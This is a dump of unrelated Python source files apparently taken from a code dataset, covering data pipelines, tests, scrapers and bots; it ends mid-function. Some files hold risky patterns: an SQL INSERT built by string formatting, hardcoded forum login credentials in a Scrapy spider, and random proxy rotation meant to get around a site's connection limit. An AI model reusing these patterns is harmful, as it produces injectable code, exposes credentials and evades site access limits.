\"/home/souhagaa/Bureau/test/server/UX/UX/data/interm/data_clean.csv\"\n return sampling(interm_cleaned_files[\"data_clean\"], output_dir, 30)\n except:\n print(\"something went wrong while cleaning data\")\n traceback.print_exc(file=sys.stdout)\n return []\n\n\ndef session_identification(cleaned_files, output_dir):\n created_files = []\n for f in cleaned_files:\n output_file = output_dir + 'sessions_user_{}.csv'.format(f[0])\n created_files.append((f[0], output_file))\n execute_session_identification(f[1], 
output_file)\n return created_files\n\n\ndef training(session_files, output_dir):\n \"\"\"\n training_set_path=\"\", test_set_path=\"\", output_model_path=\"\"\n \"\"\"\n created_files = []\n i = 0\n for f in session_files:\n output_file = output_dir + \"user_{}_markov_model.rds\".format(f[0])\n created_files.append((f[0], output_file))\n fitting_model(f[1], None, output_file, i)\n i += 1\n return created_files\n","sub_path":"UX/tasks/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"71273893","text":"#!/usr/bin/env python\nimport os\n\nFOLDER = 'DATA'\nFILENAME = 'alice.txt'\n\nfile_path = os.path.join(FOLDER, FILENAME)\nprint(\"file path:\", file_path)\n\n# file_path = os.sep.join([FOLDER, FILENAME])\n# print(\"file path:\", file_path)\n\nfile_size = os.path.getsize(file_path)\nprint(\"file size:\", file_size)\n\nfile_timestamp_raw = os.path.getmtime(file_path)\nprint(\"raw timestamp:\", file_timestamp_raw)\n\nfrom datetime import datetime\nfile_timestamp = datetime.fromtimestamp(file_timestamp_raw)\nprint(\"timestamp:\", file_timestamp)\n\n\n","sub_path":"os_path.py","file_name":"os_path.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314046467","text":"__author__ = 'xking'\n\n\ndef print_prime(n):\n for i in xrange(2, n):\n found = True\n for j in xrange(n, i):\n if i % j == 0:\n found = False\n break\n if found:\n print('{} is a prime number'.format(i))\n\n\ndef print_prime2(n):\n for i in xrange(2, n):\n for j in xrange(2, i):\n if i % j == 0:\n break\n else:\n print('{} is a prime number'.format(i))\n\n\nprint_prime2(100)","sub_path":"suggestions/else_statment.py","file_name":"else_statment.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319950154","text":"# -*- coding: utf-8 -*-\n\"\"\" Common factory implementation. \"\"\"\n\nimport factory # noqa\n\nfrom factory.alchemy import SQLAlchemyModelFactory\n\nfrom versions_service.database import db, SQLAlchemyError\n\n\nclass BaseFactory(SQLAlchemyModelFactory):\n \"\"\" The base factory. \"\"\"\n\n class Meta:\n \"\"\" Global factory configuration. \"\"\"\n\n abstract = True\n sqlalchemy_session = db.session\n sqlalchemy_session_persistence = 'flush'\n\n @classmethod\n def _create(cls, *args, **kwargs):\n \"\"\"_create\n\n An override of the BaseFactory from factory_boy. This simply wraps the method from the\n parent and rolls back the current transaction if it fails. 
This is primarily to model\n the behavior of the top-level Model class.\n\n :param *args:\n Args to proxy to the parent method.\n :param **kwargs:\n Kwargs to proxy to the parent method.\n \"\"\"\n try:\n return super()._create(*args, **kwargs)\n except SQLAlchemyError:\n cls._meta.sqlalchemy_session.rollback()\n raise\n","sub_path":"tests/factories/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"605038984","text":"from unittest import TestCase\n\nfrom mock import patch\n\nfrom pyinfra.api import Config, State\nfrom pyinfra.api.exceptions import PyinfraError\n\nfrom ..util import make_inventory\n\n\nclass TestStateApi(TestCase):\n def test_require_pyinfra_requirement_ok(self):\n config = Config(REQUIRE_PYINFRA_VERSION='>=100')\n inventory = make_inventory()\n\n with patch('pyinfra.api.state.__version__', '100'):\n State(inventory, config)\n\n def test_require_pyinfra_requirement_too_low(self):\n config = Config(REQUIRE_PYINFRA_VERSION='>=100')\n inventory = make_inventory()\n\n with self.assertRaises(PyinfraError) as context:\n with patch('pyinfra.api.state.__version__', '99'):\n State(inventory, config)\n\n assert context.exception.args[0] == (\n 'pyinfra version requirement not met (requires >=100, running 99)'\n )\n\n def test_require_pyinfra_min_version_ok(self):\n config = Config(MIN_PYINFRA_VERSION=100)\n inventory = make_inventory()\n\n with patch('pyinfra.api.state.__version__', '100'):\n State(inventory, config)\n\n def test_pyinfra_min_version_ignored_when_required_version_set(self):\n config = Config(\n REQUIRE_PYINFRA_VERSION='==100',\n MIN_PYINFRA_VERSION=1000, # should be ignored\n )\n inventory = make_inventory()\n\n with patch('pyinfra.api.state.__version__', '100'):\n State(inventory, config)\n","sub_path":"tests/test_api/test_api_state.py","file_name":"test_api_state.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358026764","text":"# Reverse a string function - instead of using 'reversed' or [::-1]\n\ndef reverse(text):\n string = []\n length = len(text)-1\n while len(string) < len(text):\n string.append(text[length])\n length -= 1\n\n return ''.join(string)","sub_path":"reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"445476930","text":"\nimport pika\nimport mysql.connector\nfrom datetime import date\n\nclass Logs:\n def __init__(self, hostname):\n self.hostname = hostname\n self.conn = mysql.connector.connect(\n user='root',\n password='test',\n host='MySQLServiceDB',\n database='LogDB')\n self.cursor = self.conn.cursor()\n\n def send(self, msg):\n datte = date.today()\n datte = str(datte)\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.hostname))\n channel = self.connection.channel()\n channel.queue_declare(queue='my_queue')\n channel.basic_publish(exchange='',\n routing_key='my_queue',\n body=msg)\n self.cursor.execute(\"INSERT INTO logs (message, creation_date) VALUES ('{}', '{}')\".format(msg, datte))\n self.conn.commit()\n self.connection.close()\n\n def recieve(self):\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.hostname))\n channel = self.connection.channel()\n channel.queue_declare(queue='my_queue')\n def callback(ch, method, properties, 
body):\n print(\" [x] Received %r\" % body)\n channel.basic_consume(queue='my_queue',\n on_message_callback=callback,\n auto_ack=True)\n print(' [*] Waiting for logs. To exit press CTRL+C')\n channel.start_consuming()\n","sub_path":"python_movies_service_api/logs/LogsObject.py","file_name":"LogsObject.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"476272377","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.contrib.linkextractors import LinkExtractor\n#from scrapy.selector import HtmlXPathSelector\nfrom scrapy.selector import Selector\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom sis001crawl.items import Sis001CrawlItem\nfrom scrapy.http import Request,FormRequest\nfrom scrapy import log\nimport requests\nimport re\n\n\n\n\nclass Sis001botSpider(CrawlSpider):\n\tname = 'sis001bot'\n\tallowed_domains = ['38.103.161.185']\n\tstart_urls = ['http://38.103.161.185/forum/forum-411-1.html']\n\t#rules = (Rule(LinkExtractor(allow=r'forum-25-[1-9].html'), callback='topicparse', follow=True),)\n\t\n\tdef parse(self,response):\n\t\tpages = []\n\t\tx = 2\n\t\tfor page in range(1,x):\n\t\t\tnextpage = 'http://38.103.161.185/forum/forum-411-'+str(page)+'.html'\n\t\t\tpages.append(nextpage)\t\n\t\tfor page in pages:\n\t\t\tself.log(\"page is %s\"%page)\n\t\t\tyield Request(page,callback=self.topicparse)\t\t\n\t\n\tdef topicparse(self,response):\n\t\ti = Sis001CrawlItem()\n\t\ti['topic_urls'] = response.xpath(\"//tbody/tr/th/span/a/@href\").extract()\n\t\t#self.log(\"-----[[%s]]\"%i['topic_urls'])\n\t\ttopic_urls = []\n\t\tfor url in i['topic_urls']:\n\t\t\tif re.match('thread-\\d{1,}-1-\\d{1,}.html',url):\n\t\t\t\turl = 'http://38.103.161.185/forum/'+url\n\t\t\t\t#self.log(\"-----%s\"%url)\n\t\t\t\ttopic_urls.append(url)\n\t\t#self.log(\"-----%s\"%topic_urls)\n\t\tfor topic in topic_urls:\n\t\t\tyield Request(topic,callback=self.imgparse)\t\n\t\t\t\n\tdef imgparse(self,response):\n\t\ti = Sis001CrawlItem()\n\t\tsel = Selector(response)\n\t\t#self.log(\"---------%s\"%url)\n\t\ti['headTitle'] = response.xpath('/html/head/title/text()').extract()\n\t\ti['imgurl'] = sel.xpath('//img/@src').re('.*?\\.jpg')\n\t\treturn i\n\t\n\tdef start_requests(self):\n\t\treturn[FormRequest(\n\t\t\t\"http://38.103.161.185/forum/logging.php?action=login\",\n\t\t\tformdata = {\n\t\t\t\"formhash\":\"%s\"%hash,\n\t\t\t\"referer\":\"http://38.103.161.185/forum/index.php\",\n\t\t\t\"loginfield\":\"username\",\n\t\t\t\"62838ebfea47071969cead9d87a2f1f7\":\"volstad\",\n\t\t\t\"c95b1308bda0a3589f68f75d23b15938\":\"194105\",\n\t\t\t\"questionid\":\"4\",\n\t\t\t\"answer\":b\"\\xd0\\xec\\xc0\\xf6\\xbb\\xaa\",#\"answer\":\"\\xd0\\xec\\xc0\\xf6\\xbb\\xaa\",\n\t\t\t\"cookietime\":\"2592000\",\n\t\t\t\"loginmode\":\"\",\n\t\t\t\"styleid\":\"\",\n\t\t\t\"loginsubmit\":\"true\"},\n\t\t\tcallback = self.after_login\t\t\n\t\t)]\n\t\t\n\tdef after_login(self, response):\n\t\tfor url in self.start_urls:\n\t\t\tyield self.make_requests_from_url(url)\n\n\tdef getHash(self):\n\t\thash_html = requests.get('http://38.103.161.185/forum/logging.php?action=login',headers=self.browse_headers)\n\t\thash = re.findall(b'',hash_html.content)\n\t\thash = hash.pop()\n\t\treturn hash\t\t\n\n\t\t\t\n","sub_path":"sis001crawl/spiders/sis001bot.py","file_name":"sis001bot.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377752703","text":"#! 
-*- encoding=utf-8 -*-\nfrom django.urls import path, include\nfrom . import views\n\n# 应用路由说明\n# list/\n# list/\n# \n# \n# \n# \n# \n# \n# \n# 返回列表的url\nextra_list_patterns = [\n path('', views.TasksForPageListView.as_view(), \n name='tasks-first-page-list'),\n path('', views.TasksForPageListView.as_view(), \n name='tasks-paged-list'),\n path('deadline/', views.TasksForDateListView.as_view(),\n name='tasks-deadline-list'),\n path('priority//', views.TasksForPriorityListView.as_view(),\n name='tasks-priority-list'),\n path('project//', views.TasksForProjectListView.as_view(),\n name='tasks-project-list'),\n path('tag//', views.TasksForTagListView.as_view(),\n name='tasks-tag-list')\n]\n\n# 返回详情的url\nextra_detail_patterns = [\n path('', views.TaskDetailView.as_view(),\n name='task-detail'),\n]\n\n# 返回操作的url\nextra_operation_patterns = [\n path('destory/', views.TaskDeleteView.as_view(),\n name='delete-a-task'),\n path('edit/', views.TaskEditView.as_view(),\n name='edit-a-task'),\n path('create', views.TaskCreateView.as_view(),\n name='create-a-task'),\n path('done/', views.TaskDoneView.as_view(),\n name='done-a-task')\n]\n\n# 集成url\nurlpatterns = [\n path('list/', include(extra_list_patterns)),\n path('detail/', include(extra_detail_patterns)),\n path('operation/', include(extra_operation_patterns))\n]\n","sub_path":"todoBackend/todolist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597949294","text":"#!/usr/bin/python3\n\"\"\"Module to Find state (only one)\n\"\"\"\nimport MySQLdb\nimport sys\n\n\nif __name__ == '__main__':\n db = MySQLdb.connect('localhost', sys.argv[1], sys.argv[2], sys.argv[3])\n cursor = db.cursor()\n\n sql = \"SELECT * FROM states WHERE name=%s ORDER BY states.id ASC\"\n cursor.execute(sql , (sys.argv[4],))\n data = cursor.fetchall()\n for item in data:\n print(item)\n db.close()\n","sub_path":"0x0F-python-object_relational_mapping/3-my_safe_filter_states.py","file_name":"3-my_safe_filter_states.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534689861","text":"from unittest.mock import MagicMock\nfrom nose.tools import with_setup\nfrom dapla.magics.blueprint import Blueprint\n\nmagic = None\nshell = None\nipython_display = None\n\n\ndef _setup():\n global magic, spark_controller, shell, ipython_display\n\n magic = Blueprint(shell=None)\n magic.shell = shell = MagicMock()\n magic.shell.user_ns = {}\n magic.ipython_display = ipython_display = MagicMock()\n\n\ndef _teardown():\n pass\n\n\n@with_setup(_setup, _teardown)\ndef test_define_input():\n cell = \"alias /some/path\"\n magic.define_input(None, cell)\n assert magic._input_datasets == {'alias': {'dataset': None, 'path': '/some/path'}}\n ref = magic.get_input(\"alias\")\n assert ref['path'] == \"/some/path\"\n\n@with_setup(_setup, _teardown)\ndef test_register_input():\n cell = \"alias /some/path\"\n magic.define_input(None, cell)\n magic.shell.user_ns['realdataset'] = {'dataset': 'dummy'}\n magic.register_input_dataset(\"alias realdataset\")\n ref = magic.get_input(\"alias\")\n assert ref['dataset'] == {'dataset': 'dummy'}\n\n@with_setup(_setup, _teardown)\ndef test_define_output():\n cell = \"alias /some/path\"\n magic.define_output(None, cell)\n assert magic._output_datasets == {'alias': {'dataset': None, 'path': '/some/path'}}\n ref = magic.get_output(\"alias\")\n assert ref['path'] 
== \"/some/path\"\n","sub_path":"tests/test_blueprint.py","file_name":"test_blueprint.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"505108451","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nr\"\"\"\nLife's pathetic, have fun (\"▔□▔)/hi~♡ Nasy.\n\nExcited without bugs::\n\n | * *\n | . .\n | .\n | * ,\n | .\n |\n | *\n | |\\___/|\n | ) -( . ·\n | =\\ - /=\n | )===( *\n | / - \\\n | |- |\n | / - \\ 0.|.0\n | NASY___\\__( (__/_____(\\=/)__+1s____________\n | ______|____) )______|______|______|______|_\n | ___|______( (____|______|______|______|____\n | ______|____\\_|______|______|______|______|_\n | ___|______|______|______|______|______|____\n | ______|______|______|______|______|______|_\n | ___|______|______|______|______|______|____\n\nauthor : Nasy https://nasy.moe\ndate : Feb 21, 2019\nemail : Nasy \nfilename : nautc.py\nproject : nautc\n\nThere are more things in heaven and earth, Horatio, than are dreamt.\n -- From \"Hamlet\"\n\"\"\"\n__version__ = \"0.1.0\"\n# Standard Library\nimport re\nimport sys\nimport html\nfrom typing import Tuple, Iterator\nfrom urllib.parse import quote\n\n# Web Packages\nimport requests as req\n\nURL = \"http://qaz.wtf/u/convert.cgi?text={}\"\nUTC = re.compile(\n r\"(.*?)(.*?)(.*?)\", re.S\n)\n\n\ndef nautc(text: str) -> Iterator[Tuple[str, str]]:\n \"\"\"Convert plain text to obscure characters from Unicode.\"\"\"\n return map(\n lambda x: (x[0] + x[1], html.unescape(x[2])),\n UTC.findall(req.get(URL.format(quote(text))).text),\n )\n\n\n__all__ = [\"nautc\"]\n\n\ndef main() -> None:\n \"\"\"Main function.\"\"\"\n for n, s in nautc(\n not sys.stdin.isatty() and sys.stdin.read() or \"\".join(sys.argv[1:])\n ):\n print(n + s + (\"-\" * 20))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"nautc.py","file_name":"nautc.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"480181980","text":"import argparse\nimport os\nimport numpy as np\nimport imageio\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport torch\n\nfrom torch.utils import data\nfrom torchvision import transforms\n\n\nparser = argparse.ArgumentParser(description='PyTorch dataloader')\nparser.add_argument('data', metavar='DIR',\n help='path to dataset')\nparser.add_argument('-j', '--workers', default=12, type=int, metavar='N',\n help='number of data loading workers (default: 12)')\nparser.add_argument('-b', '--batch-size', default=8, type=int,\n metavar='N', help='mini-batch size (default: 8)')\n\n\ndef calc_padding(height, width):\n y_pad = 32 - height % 32\n y_min_pad = int(y_pad / 2)\n y_max_pad = y_pad - y_min_pad\n \n x_pad = 32 - width % 32\n x_min_pad = int(x_pad / 2)\n x_max_pad = x_pad - x_min_pad\n\n return x_min_pad, y_min_pad, x_max_pad, y_max_pad\n\n\nclass TGSSaltDataset(data.Dataset):\n def __init__(self, root_path, file_list, transform=None, test_mode=False):\n self.root_path = root_path\n self.file_list = file_list\n self.transform = transform\n self.test_mode = test_mode\n\n def __len__(self):\n return len(self.file_list)\n \n def _load_image(self, image_path):\n return Image.open(image_path).convert('L')\n\n def __getitem__(self, index):\n if index not in range(0, len(self.file_list)):\n return self.__getitem__(np.random.randint(0, self.__len__()))\n \n file_id = self.file_list[index]\n \n image_folder = 
os.path.join(self.root_path, \"images\")\n image_path = os.path.join(image_folder, file_id + \".png\")\n \n # mask_folder = os.path.join(self.root_path, \"masks\")\n # mask_path = os.path.join(mask_folder, file_id + \".png\")\n \n # image = np.array(imageio.imread(image_path), dtype=np.uint8)\n # mask = np.array(imageio.imread(mask_path), dtype=np.uint8)\n if not self.test_mode:\n mask_folder = os.path.join(self.root_path, \"masks\")\n mask_path = os.path.join(mask_folder, file_id + \".png\")\n image, mask = self._load_image(image_path), self._load_image(mask_path)\n processed_image, processed_mask = self.transform(image), self.transform(mask)\n return processed_image, processed_mask\n else:\n image = self._load_image(image_path)\n processed_image = self.transform(image)\n return processed_image\n\n\n# Debug\nif __name__ == '__main__':\n args = parser.parse_args()\n\n traindir = os.path.join(args.data, 'train')\n testdir = os.path.join(args.data, 'test')\n train_file_list = pd.read_csv(os.path.join(args.data, 'train.csv'))['id']\n test_file_list = pd.read_csv(os.path.join(args.data, 'sample_submission.csv'))['id']\n # normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])\n pad = transforms.Pad(padding=calc_padding(height=101, width=101))\n\n train_dataset = TGSSaltDataset(traindir, train_file_list,\n transforms.Compose([pad, transforms.ToTensor()]))\n test_dataset = TGSSaltDataset(testdir, test_file_list, \n transforms.Compose([pad, transforms.ToTensor()]),\n test_mode=True)\n\n train_loader = data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.workers)\n test_loader = data.DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.workers)\n \n for i, (image, mask) in enumerate(train_loader):\n print(i, image.max(), mask.max())\n\n # for i, image in enumerate(test_loader):\n # print(i, image.shape)","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"230260242","text":"from bamboohr import Bamboohr\nimport slack as sl\nfrom datetime import datetime\nimport os\n\n\nSLACK_BOT_TOKEN = os.environ[\"SLACK_BOT_TOKEN\"]\nclient = sl.WebClient(token=SLACK_BOT_TOKEN)\nbamboohr = Bamboohr()\n\n\nclass SlackMessages:\n buttons = [\n {\n \"name\": \"choice\",\n \"text\": \"Post this message to #general\",\n \"type\": \"button\",\n \"value\": \"choice\"\n },\n {\n \"name\": \"cancel\",\n \"text\": \"Cancel\",\n \"type\": \"button\",\n \"value\": \"cancel\"\n }\n ]\n\n def __init__(self, test_channel):\n self.test_channel = test_channel\n\n def send_welcome_message(self):\n newbies_list = bamboohr.check_newbies()\n for i in newbies_list:\n newbie = bamboohr.get_emp_profile_by_id(i).json()\n emp_photo = bamboohr.get_emp_photo_url(i)\n message = f\"*Welcome Our Newest Team Member :vgs: *\\n\" \\\n f\"*{newbie['firstName']} {newbie['lastName']}*\\n\" \\\n f\"\\nHey Team, \\n\\n\" \\\n f\"We are happy to have *{newbie['firstName']} {newbie['lastName']}*\" \\\n f\"join us as *{newbie['jobTitle']}* in :world_map: *{newbie['location']}* office.\\n\" \\\n f\"{newbie['firstName']}'s first day is today, so please take the time to say hi and welcome \" \\\n f\"{newbie['firstName']} to the team :hugging_face::raised_hands::rocket:\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"attachment_type\": 
\"default\",\n \"callback_id\": \"menu_options_2319\",\n \"pretext\": newbie['firstName'],\n \"image_url\": emp_photo,\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n\n def send_hb_message(self):\n hb_list = bamboohr.check_hb()\n newbies = bamboohr.check_newbies()\n if len(hb_list) > 2:\n message_full_names = ''\n message_names = ''\n for i in hb_list:\n hb_one = bamboohr.get_emp_profile_by_id(i)\n if hb_one:\n hb_one = hb_one.json()\n else:\n continue\n if hb_one['id'] in newbies:\n continue\n message_full_names += hb_one['firstName'] + ' ' + hb_one['lastName'] + ', '\n message_names += hb_one['firstName'] + ', '\n message_full_names = message_full_names[:-2]\n message = f\"Let’s start today’s day with warm congrats to *{message_full_names}*.\" \\\n f\"\\nWe all wish you an unforgettable day today and a fantastic year ahead!:hugging_face::tada:\" \\\n f\"\\nExtremely happy to have you at VGS:vgs::rocket:\" \\\n f\"\\nhttp://bestanimations.com/Holidays/Birthday/birthdaygifs/happy-birthday-colorful-type-animated-gif.gif\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n else:\n for i in hb_list:\n hb_one = bamboohr.get_emp_profile_by_id(i)\n emp_photo = bamboohr.get_emp_photo_url(i)\n if hb_one:\n hb_one = hb_one.json()\n if hb_one in newbies:\n continue\n message = f\"Let’s start today’s day with warm congrats to *{hb_one['firstName']} {hb_one['lastName']}*.\" \\\n f\"\\nWe all wish you an unforgettable day today and a fantastic year ahead!:hugging_face::tada:\" \\\n f\"\\nExtremely happy to have you at VGS:vgs::rocket:\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"pretext\": hb_one['firstName'],\n \"image_url\": emp_photo,\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n\n def send_anniversary_message(self):\n anniversary_list = bamboohr.check_anniversary()\n newbies = bamboohr.check_newbies()\n if len(anniversary_list) > 2:\n message_full_names = ''\n message_names = ''\n for i in anniversary_list:\n anniversary_one = bamboohr.get_emp_profile_by_id(i[0])\n if anniversary_one:\n anniversary_one = anniversary_one.json()\n else:\n continue\n if anniversary_one['id'] in newbies:\n continue\n message_full_names += anniversary_one['firstName'] + ' ' + anniversary_one['lastName'] + ', '\n message_names += anniversary_one['firstName'] + ', '\n message_full_names = message_full_names[:-2]\n message_names = message_names[:-2]\n message = f\"Let’s take a minute to wish a happy anniversary to *{message_full_names}* at VGS! \" \\\n f\":vgs::hugging_face:\" \\\n f\"\\nWe want to say thank you for all your efforts and achievements that help us get where we are now! \" \\\n f\"\\n*{message_names}*, let the upcoming year at VGS be even more challenging and significant! 
\" \\\n f\":wink::sparkles::rocket:\" \\\n f\"\\nhttps://tenor.com/view/happyanniversary-gif-13014753\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n else:\n for i in anniversary_list:\n anniversary_one = bamboohr.get_emp_profile_by_id(i[0])\n if anniversary_one:\n anniversary_one = anniversary_one.json()\n else:\n continue\n if anniversary_one['id'] in newbies:\n continue\n emp_photo = bamboohr.get_emp_photo_url(i[0])\n years = str(int(datetime.today().strftime('%Y')) - int(i[1]))\n message = f\"Let’s take a minute to wish a happy {years} years anniversary to *{anniversary_one['firstName']} \" \\\n f\"{anniversary_one['lastName']}* at VGS! :vgs::hugging_face:\" \\\n f\"\\nWe want to say thank you for all your efforts and achievements that help us get where we are now! \" \\\n f\"\\n{anniversary_one['firstName']}, let the upcoming year at VGS \" \\\n f\"be even more challenging and significant! :wink::sparkles::rocket:\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"pretext\": anniversary_one['firstName'],\n \"image_url\": emp_photo,\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n","sub_path":"slack_messages.py","file_name":"slack_messages.py","file_ext":"py","file_size_in_byte":8682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"265622344","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPython3.5\nChange conf/main.json with category URL\n\n~ 1000 connection limit from 1 IP\n\ntemp.json is for tracking what page was parsed. 
Structure example:\n{\n \"url\": \"https://prom.ua/Komplektuyuschie-dlya-holodilnogo-i-teploobmennogo-oborudovaniya\",\n \"pages_collected\": false\n}\n\n\"\"\"\nimport time\nimport json\nimport urllib.request\nimport pymysql\nimport random\n\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\n\nconfig_path = 'conf/main.json'\nconfig_file = Path(config_path)\nif not config_file.is_file():\n raise FileNotFoundError\n\n\ndef get_from_config(key):\n with open(config_path) as f:\n data = json.load(f)\n return data.get(key)\n\n\ndb = pymysql.connect(**get_from_config('db'))\ncur = db.cursor()\n\n\ndebug = get_from_config('debug')\nsleep = get_from_config('sleep')\npages = get_from_config('urls_path')\nsave_to_mysql = get_from_config('to_mysql')\n\n\ndef install_proxy():\n proxies = ['138.97.147.238:44648', '115.85.68.99:48256', '195.200.237.22:8080', ' 213.234.29.164:8080',\n '188.68.106.152:56532', '79.115.245.227:8080', '194.237.247.227:58820', '180.254.48.155:3128',\n '91.144.139.93:3128', '177.52.250.126:8080', '209.33.120.66:57679', '183.89.202.114:3128']\n\n proxy = urllib.request.ProxyHandler({'https': random.choice(proxies)})\n opener = urllib.request.build_opener(proxy)\n urllib.request.install_opener(opener)\n\n\ndef category_page_urls_are_saved():\n result = False\n temp_config_path = 'conf/temp.json'\n with open(temp_config_path) as f:\n data = json.load(f)\n if data['pages_collected']:\n result = True\n return result\n\n\ndef save_to_csv(title, location, phone_numbers):\n title = title.encode('utf-8', 'replace').decode('utf-8')\n location = location.encode('utf-8', 'replace').decode('utf-8')\n phone_numbers = u' '.join(phone_numbers).encode('utf-8').strip()\n line = '{};{};{};\\n'.format(title, location, phone_numbers)\n with open('results.csv', 'ab+') as f:\n f.write(bytes(line.encode('utf-8')))\n\n\ndef save_to_temp_config(category_url):\n data = {\n \"url\": category_url,\n \"pages_collected\": True\n }\n fp = open('conf/temp.json', 'w+')\n fp.write(json.dumps(data))\n\n\ndef remove_url_from_queue(url):\n fp = open(pages, 'r')\n lines = fp.readlines()\n fp.close()\n f = open(pages, \"w\")\n f.seek(0)\n for i in lines:\n if i != url:\n f.write(i)\n f.truncate()\n f.close()\n\n\ndef collect_urls_from_category():\n \"\"\"\n Checking if temp config exists to see if we are already scraped page_urls\n \"\"\"\n category_url = get_from_config('category')\n\n if category_page_urls_are_saved():\n return\n\n else:\n if category_url:\n if debug:\n with open('debug/category.html', encoding='utf-8') as url:\n html_doc = url.read()\n else:\n with urllib.request.urlopen(category_url) as url:\n html_doc = url.read()\n soup = BeautifulSoup(html_doc, 'html.parser')\n pagination = soup.find_all('a', class_='x-pager__item')\n nums = []\n for page_num in pagination:\n nums.append(page_num.get_text())\n last_num_in_pagination = str(nums[2]).strip()\n\n if last_num_in_pagination:\n for num in range(2, int(last_num_in_pagination) + 1):\n with open(pages, 'a') as fp:\n fp.write('{};{}\\n'.format(category_url, num))\n save_to_temp_config(category_url)\n\n\ndef all_pages():\n fp = open(pages, 'r')\n return fp.readlines()\n\n\ndef save_to_db(t, l, p):\n sql = \"INSERT INTO `prom` (`title`, `location`, `phone`) VALUES (%s, %s, %s)\"\n cur.execute(sql, (t, l, '\\n'.join(p)))\n db.commit()\n\n\ndef fetch_category(category_url):\n if debug:\n with open('debug/category.html', encoding='utf-8') as url:\n html_doc = url.read()\n else:\n with 
